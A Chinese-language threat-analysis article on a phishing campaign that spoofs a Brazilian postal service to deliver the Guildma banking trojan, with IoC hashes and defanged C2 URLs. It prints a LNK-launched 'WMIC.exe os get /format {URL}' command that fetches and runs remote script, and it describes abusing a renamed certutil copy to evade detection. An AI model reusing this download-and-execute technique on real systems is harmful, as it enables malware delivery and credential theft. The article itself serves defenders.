研究人员最近发现一款滥用合法Windows文件wmic.exe 和certutil.exe下载payload到受害者设备上的恶意软件。wmic.exe是Windows命令行工具， certutil.exe是管理Windows证书的程序。恶意软件滥用这些合法Windows服务来进行恶意用途。

虽然WMI和CertUtil在之前的攻击活动中就被用过，但这次的攻击活动将这些文件融合到其日常活动，并增加了反检测层。这说明攻击活动背后的网络犯罪分子正在不断发展和进化其工具和技术。

 

图1: 攻击感染链

活动分析

攻击是从一个恶意邮件开始的，恶意邮件看似来源于一家巴西的国家邮政公司，邮件内容是通知邮件接收者包裹未投递成功。然后开源通过邮件中嵌入的链接查看详情。

 

图2: 含有恶意链接的邮件

接收者一旦点击邮件中嵌入的链接，就会打开一个浏览器窗口让用户下载一个zip文件。一旦zip文件下载并提取，用户就会看到一个LNK文件（Trojan.LNK.DLOADR.AUSUJM）。然后LNK文件会用下面的参数执行cmd.exe：

/k start /MIN %WINDIR$\\system32\\wbem\\WMIC.exe os get /format {URL} && exit

cmd.exe负责通过下面的参数执行wmic.exe：

os get /format {URL}

这一动作允许wmic.exe下载和执行来自C2服务器的脚本命令。然后在%temp%文件夹中创建一个名为certis.exe.的certutil.exe副本。这一步好像是以一种额外的绕过技术执行的，因为certutil.exe在之前的攻击活动已经出现过了。

下一步是一个命令certis.exe从C2服务器集中下载文件的脚本，这也是从第一个下载URL中接收的。

其中一个下载的文件是主payload，一个用regsvr32.exe执行的DLL文件（TSPY_GUILDMA.C）。其他下载的文件用作主payload的一个模块。

研究人员对主payload的分析显示这是一个银行木马，其语言被设置为葡萄牙语，也就是说涉及的攻击目标位于葡萄牙语国家，包括葡萄牙和巴西。

攻击预防

使用合法文件来增加额外的绕过层是网络犯罪分子常用的一种技术，这也是安全研究人员面临的一大问题。

用户也可以通过应用邮件安全最佳实践来预防攻击，包括：

· 检查邮件发件人身份和邮箱地址。含有奇怪和随机数字的邮件地址一般都可能是垃圾邮件或钓鱼攻击。

· 扫描邮件内容是否有语法错误或拼写错误。来自政府机构和大型企业的商业邮件一般都很专业，极少出现语法错误或拼写错误。

· 尽量不要点击邮件中的链接，也不要通过邮件中的链接下载文件。

IoCs

Trojan.LNK.DLOADR.AUSUJM (LNK文件)

· 695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a

TSPY_GUILDMA.C (DLL文件)

· d60db526c41356b43d4b916c6913f137d2f2eeb8b1d7472b5c24e3af311d486b

· 6852e458e3837c5b2e1354ed9bc5205878c0e94f1211da075dcc6305845fbc33

C2服务器

· hxxp://ewyytrtw4646934[.]eririxab[.]com:25041/03/marxvxinhhmg[.]gif[.]zip?17563326

· hxxp://ewyytrtw4646934[.]eririxab[.]com:25041/03/marxvxinhhmgx[.]gif[.]zip?658140462

· hxxp://ewyytrtw4646934[.]eririxab.com:25041/03/r1[.]log

· hxxp://ewyytrtw4646934[.]eririxab.com:25041/03/marxvxinhhm98[.]dll[.]zip?52828157

· hxxp://ewyytrtw4646934[.]eririxab.com:25041/03/marxvxinhhmhh[.]dll[.]zip?974411041

· hxxp://ewyytrtw4646934[.]eririxab.com:25041/03/marxvxinhhmhh[.]dll[.]zip?895017548

· hxxp://exxxwrtw6115614[.]kloudghtlp[.]com:25056/09/v131[.]xsl?4463977